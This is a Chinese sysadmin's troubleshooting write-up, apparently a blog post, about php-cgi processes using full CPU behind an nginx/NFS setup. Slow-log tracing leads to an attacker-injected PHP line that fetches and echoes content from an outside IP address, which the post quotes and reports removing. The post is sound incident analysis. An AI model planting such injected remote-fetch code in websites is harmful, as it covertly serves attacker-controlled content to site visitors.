linux php-cgi.exe占用cpu 100%的一次排障之旅
先说下我们网站的架构,由于目前网站访问量不是很大,但是由于最近公司网站要推广,所以将网站由单机切换成前端用nginx做负载均衡,带动两台web服务器,所有网页和静态文件都通过NFS共享调用,NFS服务装在其中的一个web服务器上,后端用mysql主从的方式,是很典型的架构。
切换成这个架构才2天,就收到nagios的报警,报警信息显示有一台web服务器负载很高,于是通过SecureCRT登录到服务器上,用top命令看了一下,发现有几个php-cgi进程占用了大量的CPU,如下:
13889www250228m14m9344S100.40.114:51.22php-cgi 13882www250227m13m9284S100.10.110:53.18php-cgi 13924www250227m99365732S100.10.123:20.80php-cgi 13927www250226m52282064R100.10.024:44.24php-cgi 13827www250228m15m10mR99.70.112:57.60php-cgi 13900www250228m19m13mR99.70.19:03.09php-cgi
由上面的截图我们可以看出那几个php-cgi进程不但占用了大量的CPU,而且运行时间非常长,本来php-cgi接到一个请求运行很快的,怎么这几个运行那么久还没释放?于是采用命令ls-l/proc/13827/fd/查看这个长时间的进程到底在干什么事情,结果如下:
lrwx------1wwwwww64Dec1112:030->socket:[68444030] l-wx------1wwwwww64Dec1112:031->pipe:[68444057] l-wx------1wwwwww64Dec1112:032->pipe:[68444058] lrwx------1wwwwww64Dec1112:033->socket:[68468225] lrwx------1wwwwww64Dec1112:034->socket:[68469788] lrwx------1wwwwww64Dec1112:035->socket:[68457928]
看到里面没有打开文件或者写入文件,这个进程没干什么事情,比较奇怪,然后采用strace命令跟踪下看看这个进程在做什么东西呢?
strace-p13827
poll([{fd=4,events=POLLIN}],1,0)=0(Timeout)
select(5,[4],[4],[],{15,0})=1(out[4],left{15,0})
poll([{fd=4,events=POLLIN}],1,0)=0(Timeout)
select(5,[4],[4],[],{15,0})=1(out[4],left{15,0})
poll([{fd=4,events=POLLIN}],1,0)=0(Timeout)
select(5,[4],[4],[],{15,0})=1(out[4],left{15,0})
poll([{fd=4,events=POLLIN}],1,0)=0(Timeout)
select(5,[4],[4],[],{15,0})=1(out[4],left{15,0})
poll([{fd=4,events=POLLIN}],1,0)=0(Timeout)
select(5,[4],[4],[],{15,0})=1(out[4],left{15,0})
poll([{fd=4,events=POLLIN}],1,0)=0(Timeout)
select(5,[4],[4],[],{15,0})=1(out[4],left{15,0})
poll([{fd=4,events=POLLIN}],1,0)=0(Timeout)…….
可以看出,这个进程不断的超时,到底为何会超时呢???看来需要从php-cgi的日志中查找问题了,由于原来php-fpm.conf配置的超时时间为0,也就是不设置超时时间。于是先将php-fpm.conf的超时时间设置成5s,然后超过5s的php-cgi的请求就会记录到php的慢日志中,设置如下:
3s
logs/slow.log
设置完成,利用命令/usr/local/php/sbin/php-fpmrestart重启php-fpm,过一会查看slow.log的内容发现很多如下内容:
script_filename=/data/htdocs/bbs.hrloo.com/apl.php
[0x00007fffb060fd70]file_get_contents()/data/htdocs/bbs.hrloo.com/apl.php:10
查看/data/htdocs/bbs.hrloo.com/apl.php第十行的内容如下:
echofile_get_contents('http://121.10.108.227:86/yh.asp');
网上查了一下发现了介绍php这个函数当里面网址响应很慢的时候就会出现CPU占用很高的情况,而且会一直卡住,不会超时,再看看这个链接,访问一下指向到了一个小说网站,是别人攻击后嵌入的,将这个文件还原后恢复正常。奇怪的是那个安装NFS的web服务器却不会出现那个问题,看来是由于本来那个站点又慢,通过NFS调用就更慢了,因此出现了这个故障。感谢这次故障,才发现了这个严重的问题。
故障修复了,但是问题还远远没有解决,重点要找到文件是如何被修改的,防止再出现类似的事故。看来下面还有很多事情要忙乎了。呵呵!